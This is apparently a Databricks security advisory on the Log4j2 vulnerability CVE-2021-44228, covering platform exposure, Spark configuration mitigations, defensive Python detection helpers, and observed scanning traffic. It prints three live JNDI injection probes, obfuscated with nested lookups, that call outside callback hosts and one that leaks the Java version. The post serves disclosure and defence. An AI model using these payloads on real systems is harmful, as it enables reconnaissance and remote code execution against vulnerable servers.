This post relates to an ongoing investigation. We will update it as significant findings emerge, including detection rules to help people investigate potential exposure to CVE-2021-44228, both within their own usage on Databricks and elsewhere. Should our investigation conclude that customers may have been impacted, we will proactively notify those customers individually by email.
As you may be aware, there has been a 0-day discovery in Log4j2, the Java logging library, that could result in Remote Code Execution (RCE) if an affected version of log4j (2.0 <= log4j <= 2.14.1) logs an attacker-controlled string value without proper validation. For more details, see CVE-2021-44228.
We currently believe the Databricks platform is not impacted. Databricks does not directly use a version of log4j known to be affected by the vulnerability within the Databricks platform in a way we understand may be vulnerable to this CVE (e.g., to log user-controlled strings). We have investigated multiple scenarios including the transitive use of log4j and class path import order and have not found any evidence of vulnerable usage so far by the Databricks platform.
While we don’t directly use an affected version of log4j, Databricks has out of an abundance of caution implemented defensive measures within the Databricks platform to mitigate potential exposure to this vulnerability, including by enabling the JVM mitigation (log4j2.formatMsgNoLookups=true) across the Databricks control plane. This protects against potential vulnerability from any transitive dependency on an affected version that may exist, whether now or in the future.
Potential issues with customer code
While we do not believe the Databricks platform is itself impacted, if you are using log4j within your Databricks data plane cluster (e.g., if you are processing user-controlled strings through log4j), your use may be vulnerable to the exploit if you have installed and are using an affected version, or have installed services that transitively depend on an affected version.
Please note that the Databricks platform is also partially protected from potential exploit within the data plane even if our customers utilize a vulnerable version of log4j within their own code as the platform does not use versions of JDKs that are particularly concerning for potential exploit (<= 8u191 for Java 8 and <= 11.0.1 for Java 11, which are configured to load the classes necessary to trigger the RCE via an attacker-controlled LDAP server). As a consequence, even certain usage by our customers of a vulnerable log4j version may be at least partially mitigated.
Recommended mitigation steps
Nevertheless, out of an abundance of caution, you may wish to reconfigure any cluster on which you have installed an affected version of log4j (>=2.0 and <=2.14.1). We strongly suggest that you either:
- update to log4j 2.15+; and/or
- for log4j 2.10-2.14.1, reconfigure the cluster with the known temporary mitigation (log4j2.formatMsgNoLookups set to true) and restart the cluster
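The version ranges above can be turned into a small triage helper. The following is a minimal sketch, not an official tool: the function names are hypothetical, it only understands plain numeric versions such as "2.14.1" (suffixes like "-beta9" are not handled), and the ranges are simply the ones quoted in this post.

```python
from typing import Tuple


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor[.patch]' into a 3-tuple, padding missing parts with 0."""
    parts = [int(p) for p in text.strip().split(".")]
    parts += [0] * (3 - len(parts))
    return (parts[0], parts[1], parts[2])


def recommended_action(log4j_version: str) -> str:
    """Map a log4j version to the option(s) listed in this post (hypothetical helper)."""
    v = parse_version(log4j_version)
    # Affected range quoted in this post: 2.0 <= version <= 2.14.1.
    if not ((2, 0, 0) <= v <= (2, 14, 1)):
        return "outside the affected range cited in this post"
    # The formatMsgNoLookups option is listed only for 2.10 through 2.14.1.
    if v >= (2, 10, 0):
        return "upgrade to 2.15+ and/or set log4j2.formatMsgNoLookups=true"
    return "upgrade to 2.15+"
```

For example, `recommended_action("2.9.1")` returns only the upgrade option, because the temporary flag is listed here only for 2.10 and later.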
The steps to mitigate 2.10-2.14.1 are:
- Edit the cluster and job so that the Spark conf settings “spark.driver.extraJavaOptions” and “spark.executor.extraJavaOptions” are set to “-Dlog4j2.formatMsgNoLookups=true”
- Confirm the edit to restart the cluster, or simply trigger a new job run, which will use the updated Java options.
- You can confirm that these settings have taken effect in the “Spark UI” tab, under “Environment”.
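The confirmation step can also be scripted. The sketch below is illustrative only: `missing_mitigation` is a hypothetical helper that takes Spark configuration key/value pairs (for example, as copied from the “Environment” page, or in a notebook from `spark.sparkContext.getConf().getAll()`) and reports which of the two settings does not carry the flag.

```python
from typing import Iterable, List, Tuple

FLAG = "-Dlog4j2.formatMsgNoLookups=true"
REQUIRED_KEYS = (
    "spark.driver.extraJavaOptions",
    "spark.executor.extraJavaOptions",
)


def missing_mitigation(conf_pairs: Iterable[Tuple[str, str]]) -> List[str]:
    """Return the required Spark conf keys whose value lacks the mitigation flag."""
    conf = dict(conf_pairs)
    # Java options are whitespace-separated, so compare whole tokens.
    return [key for key in REQUIRED_KEYS if FLAG not in conf.get(key, "").split()]
```

An empty result means both the driver and executor options include the flag. It does not prove that every JVM on the cluster was restarted with it.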
Please note that because we do not control the code you run through our platforms, we cannot confirm that the mitigations will be sufficient for your use cases.
Signals of potential attempted exploit
As part of our investigation, we continue to analyze traffic on our platform in depth. To date, we have not found any evidence of this vulnerability being successfully exploited against either the Databricks platform itself or our customers’ use of the platform.
We have, however, discovered a number of signals that we think may be of significant interest to the security community:
In the initial hours following this vulnerability becoming widely known, automated scanners began scouring the internet utilizing simple callbacks to identify potential targets. While the vast majority of scans are using the LDAP protocol used in the initial proof-of-concept, we have seen callback attempts utilizing the following protocols:
Additionally, we have seen attackers attempt to obfuscate their activities to avoid prevention or detection by nesting message lookups. The following example (from a manipulated UserAgent field) will bypass simple filters/searches for “jndi:ldap”:
${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
This obfuscation is not limited to the method, as message lookups can be deeply nested. As an example, this very exotic probe attempts to wildly obfuscate the JNDI lookup as well:
${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa:-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540}
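One way to search for probes like the two shown above is to undo the nesting before matching. The following is a rough sketch under simplifying assumptions, not a complete detection rule: it only expands `lower:` and `upper:` lookups and `:-` defaults, it assumes any other lookup with a default fails and yields that default, and the function names are hypothetical.

```python
import re
from typing import Optional

# Matches an innermost lookup: "${...}" whose body contains no further "${".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> Optional[str]:
    """Return the text a lookup body is assumed to expand to, or None if unknown."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        # Assumption: the lookup itself fails, so the default after ":-" is used.
        return body.split(":-", 1)[1]
    return None


def _expand(match: "re.Match[str]") -> str:
    resolved = _resolve(match.group(1))
    # Leave lookups we cannot resolve (e.g. jndi:, sys:) untouched.
    return match.group(0) if resolved is None else resolved


def deobfuscate(text: str, max_passes: int = 20) -> str:
    """Repeatedly expand innermost lookups until nothing changes."""
    for _ in range(max_passes):
        expanded = _INNERMOST.sub(_expand, text)
        if expanded == text:
            break
        text = expanded
    return text


def looks_like_jndi_probe(text: str) -> bool:
    """True if the de-obfuscated text contains a JNDI lookup."""
    return "${jndi:" in deobfuscate(text).lower()
```

Applied to the first probe above, `deobfuscate` yields `${jndi:ldap://world80.log4j.binAryedge.io:80/callback}`, which a plain search for “jndi:ldap” would then match. Attackers can use other lookups that this sketch does not expand, so treat a negative result as inconclusive.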
Even without successful remote code execution, attackers can gain valuable insight into the state of the target environment, as message lookups can leak environment variables and other system information. This example attempts to enumerate the Java version on the target system:
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${sys:java.version}.xxx.yyy.databricks.com.as3z18.dnslog.cn}
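When triaging a probe like this, it helps to know which values it tried to exfiltrate. The sketch below is a hypothetical helper that lists `sys:` and `env:` lookups embedded in a payload; it does no de-obfuscation, so a nested or disguised lookup name would be missed.

```python
import re
from typing import List, Tuple

# "${sys:NAME" or "${env:NAME"; NAME stops at ":", "}", "{" or "$".
_LEAK_LOOKUP = re.compile(r"\$\{(sys|env):([^${}:]+)", re.IGNORECASE)


def leaked_lookups(payload: str) -> List[Tuple[str, str]]:
    """Return (kind, name) pairs for system-property and environment lookups."""
    return [(kind.lower(), name) for kind, name in _LEAK_LOOKUP.findall(payload)]
```

For the example above, this returns `[("sys", "java.version")]`, meaning the callback hostname would have carried the target's Java version.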
Modern Java runtimes, including the versions used within the Databricks platform, include restrictions that make wide-scale exploitation of this vulnerability more difficult. However, as mentioned in the Veracode research blog “Exploiting JNDI Injections in Java,” attackers can utilize certain already-existing object factories in the local classpath to trigger this (and similar) vulnerabilities. Attempts to load a remote class using a gadget chain that does not exist on the target may produce Java stack traces with a warning containing “Error looking up JNDI resource [ldap://xxx.yyy.yyy.zzz:port/class]”. Beyond the standard callback scanning, such warnings are worth watching for, as they may indicate a more sophisticated exploitation attempt.
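A simple log search for that warning might look like the following. This is a minimal sketch: the message text is taken from the example above, the function name is hypothetical, and real log formats may wrap or prefix the message differently.

```python
import re
from typing import Iterable, List

# Captures the resource inside the square brackets of the warning.
_JNDI_ERROR = re.compile(r"Error looking up JNDI resource \[([^\]]*)\]")


def jndi_lookup_errors(lines: Iterable[str]) -> List[str]:
    """Return every JNDI resource named in a lookup-failure warning."""
    return [m.group(1) for line in lines for m in _JNDI_ERROR.finditer(line)]
```

The function accepts any iterable of strings, including an open log file, and returns the resource URLs for follow-up, for example to check whether the host is a known scanner.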
Security community call to action
We encourage the security community to keep sharing indicators of compromise and exploitation techniques to further protect against this critical vulnerability. If you prefer to engage privately, please contact us at security@databricks.com.
The post Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment appeared first on Databricks.